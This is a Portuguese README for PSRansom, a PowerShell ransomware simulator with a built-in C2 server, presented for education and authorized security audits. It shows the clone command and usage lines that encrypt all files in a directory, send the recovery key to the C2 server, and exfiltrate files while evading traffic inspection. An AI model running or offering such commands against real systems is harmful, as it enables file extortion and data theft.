
Simulador de Ransomware PowerShell com Servidor C2

PSRansom é um Simulador de Ransomware em PowerShell com capacidades de servidor C2. Esta ferramenta ajuda a simular o processo de criptografia de um ransomware genérico em qualquer sistema com PowerShell instalado. Graças ao servidor C2 integrado, você pode exfiltrar arquivos e receber informações do cliente via HTTP.
Toda a comunicação entre os dois elementos é criptografada ou codificada para não ser detectada por mecanismos de inspeção de tráfego, embora em nenhum momento seja usado HTTPS.
Recomenda-se clonar o repositório completo ou baixar o arquivo zip. Você pode fazer isso executando o seguinte comando:
git clone https://github.com/JoelGMSec/PSRansom
.\PSRansom -h
____ ____ ____
| _ \/ ___|| _ \ __ _ _ __ ___ ___ _ __ ___
| |_) \___ \| |_) / _' | '_ \/ __|/ _ \| '_ ' _ \
| __/ ___) | _ < (_| | | | \__ \ (_) | | | | | |
|_| |____/|_| \_\__,_|_| |_|___/\___/|_| |_| |_|
----------------- by @JoelGMSec ----------------
Informações: Esta ferramenta ajuda a simular o processo de criptografia de um
ransomware genérico em PowerShell com capacidades C2
Uso: .\PSRansom.ps1 -e Diretório -s ServidorC2 -p PortaC2
Criptografa todos os arquivos e envia a chave de recuperação para o ServidorC2
Use -x para exfiltrar e descriptografar arquivos no ServidorC2
.\PSRansom.ps1 -d Diretório -k ChaveRecuperacao
Descriptografa todos os arquivos com a string da chave de recuperação
Aviso: Todas as informações serão enviadas para o ServidorC2 sem qualquer criptografia
Você precisa de uma chave de recuperação gerada anteriormente para recuperar os arquivos
https://darkbyte.net/psransom-simulando-un-ransomware-generico-con-powershell
Este projeto está licenciado sob a licença GNU 3.0 - consulte o arquivo LICENSE para mais detalhes.
Esta ferramenta foi criada e projetada do zero por Joel Gámez Molina // @JoelGMSec
Este software não oferece qualquer tipo de garantia. Seu uso é exclusivo para ambientes educacionais e/ou auditorias de segurança com o consentimento correspondente do cliente. Não me responsabilizo por seu uso indevido ou por qualquer dano possível causado por ele.
Para mais informações, você pode me encontrar no Twitter como @JoelGMSec e no meu blog darkbyte.net.
Você pode apoiar meu trabalho comprando-me um café: